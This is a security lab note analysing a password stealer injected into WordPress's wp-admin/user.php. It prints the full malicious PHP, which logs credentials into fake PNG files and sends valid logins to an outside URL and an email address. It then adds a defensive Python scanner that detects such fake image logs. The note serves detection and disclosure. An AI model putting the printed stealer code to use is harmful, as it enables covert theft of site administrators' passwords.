WordPress password stealer

Labs Note

Following Fio’s recent post on the Joomla password stealer, here’s another beautiful example of a password stealer, this time from a WordPress environment.

It’s easy to understand, but what’s interesting is that it looks like legitimate code, so you can easily overlook it. It stores the captured credentials in fake “png” files under the ./wp-includes/images/ path and mails each successful login to a non-obfuscated email address (it also posts it to a remote URL).

This is the malicious part that was injected into the file user.php in wp-admin:

// Start Login Protection
    // Record for this attempt: host|user:password|ip (the stolen data)
    $ip = $_SERVER["REMOTE_ADDR"];
    $stringData = $_SERVER["SERVER_NAME"] . "|" . $username . ":" . $password . "|" . $ip . "\n";
    $today = date("j");
    // Log files disguised as images inside wp-includes/images/
    $myErrorFile = getcwd() . "/wp-includes/images/icon-download.png";
    $mySuccessFile = getcwd() . "/wp-includes/images/icon-up-flag.png";
    $failedLogContent = @file_get_contents($myErrorFile);
    $successLogContent = @file_get_contents($mySuccessFile);
    // First line of the failed-login file is the day of month it was created; it is reset after 7 days
    $errorFileLines = explode("\n", $failedLogContent);
    $diff = $today - $errorFileLines[0];
    if ( ($diff >= 7) || ($diff < 0) ) { @unlink($myErrorFile); $failedLogContent = ""; }
    // An IP with an earlier successful login is trusted ($userOk is never initialised, so it is falsy otherwise)
    if (preg_match("/{$ip}/i", $successLogContent)) $userOk = 1;
    // More than 5 failures from an untrusted IP: replace the submitted password with a fixed string, so the check below fails
    preg_match_all("/{$ip}/i", $failedLogContent, $matches);
    if ( (count($matches[0]) > 5) && (!$userOk) ) $password = "G4o7Ivc29OVOxcp5";
    if ( wp_check_password($password, $userdata->user_pass, $userdata->ID) ) {
        // Valid credentials: exfiltrate them over HTTP and by e-mail, then remember the IP
        @file_get_contents("http://www.carriagebandb.com/cgi-bin/optimus.pl?prime=$stringData");
        @mail("anto@netherlandbarmuda.com", $_SERVER["SERVER_NAME"], $stringData);
        if (!$userOk) {
            $fh = fopen($mySuccessFile, "a");
            fwrite($fh, "$ip\n");
            fclose($fh);
        }
    } else {
        // Failed login: append the attempt to the fake PNG
        if (!(is_file($myErrorFile))) {
            $fh = fopen($myErrorFile, "w");
            fwrite($fh, "$today\n");
            fclose($fh);
        }
        $fh = fopen($myErrorFile, "a");
        fwrite($fh, $stringData);
        fclose($fh);
    }
// END Login Protection
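A defender-side check for this family (an added example, not part of the original note or of the injected code): it walks an images directory, flags any file whose extension claims an image but whose header does not match, and then tests whether the body has the host|user:pass|ip shape the code above writes. The directory, file names and credential values in demo() are constructed for the illustration.

```python
import os
import re
import tempfile
# Header bytes for image formats expected in a WordPress images directory.
IMAGE_MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".gif": b"GIF8",
    ".jpg": b"\xff\xd8\xff",
}

# One record as the stealer writes it: host|user:pass|ip
CRED_LINE = re.compile(rb"^[^|\n]+\|[^|\n:]+:[^|\n]*\|\d{1,3}(?:\.\d{1,3}){3}$")

def is_fake_image(path):
    """True when the extension claims an image but the file header disagrees."""
    magic = IMAGE_MAGIC.get(os.path.splitext(path)[1].lower())
    if magic is None:
        return False
    with open(path, "rb") as fh:
        return fh.read(len(magic)) != magic

def looks_like_cred_log(data):
    """True when every line is host|user:pass|ip (the first may be the day number)."""
    lines = [ln for ln in data.split(b"\n") if ln]
    if lines and lines[0].isdigit():  # failed-login file starts with date("j")
        lines = lines[1:]
    return bool(lines) and all(CRED_LINE.match(ln) for ln in lines)

def scan_images_dir(directory):
    """Return (path, holds_credentials) for every fake image under directory."""
    hits = []
    for root, _, names in os.walk(directory):
        for name in names:
            path = os.path.join(root, name)
            if is_fake_image(path):
                with open(path, "rb") as fh:
                    hits.append((path, looks_like_cred_log(fh.read())))
    return sorted(hits)

def demo():
    """Constructed tree: a real PNG, a fake one with made-up credentials, a fake one with an IP list."""
    d = tempfile.mkdtemp()
    with open(os.path.join(d, "real.png"), "wb") as fh:
        fh.write(IMAGE_MAGIC[".png"] + b"\x00" * 16)
    with open(os.path.join(d, "icon-download.png"), "wb") as fh:
        fh.write(b"12\nexample.test|admin:Secret1|203.0.113.5\n")
    with open(os.path.join(d, "icon-up-flag.png"), "wb") as fh:
        fh.write(b"203.0.113.5\n")
    return scan_images_dir(d)
```

The success-log file only holds IP addresses, so it is reported as a fake image but not as a credential log; the failed-login file is reported as both.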

Anyway, keep your eyes open, guys 🙂
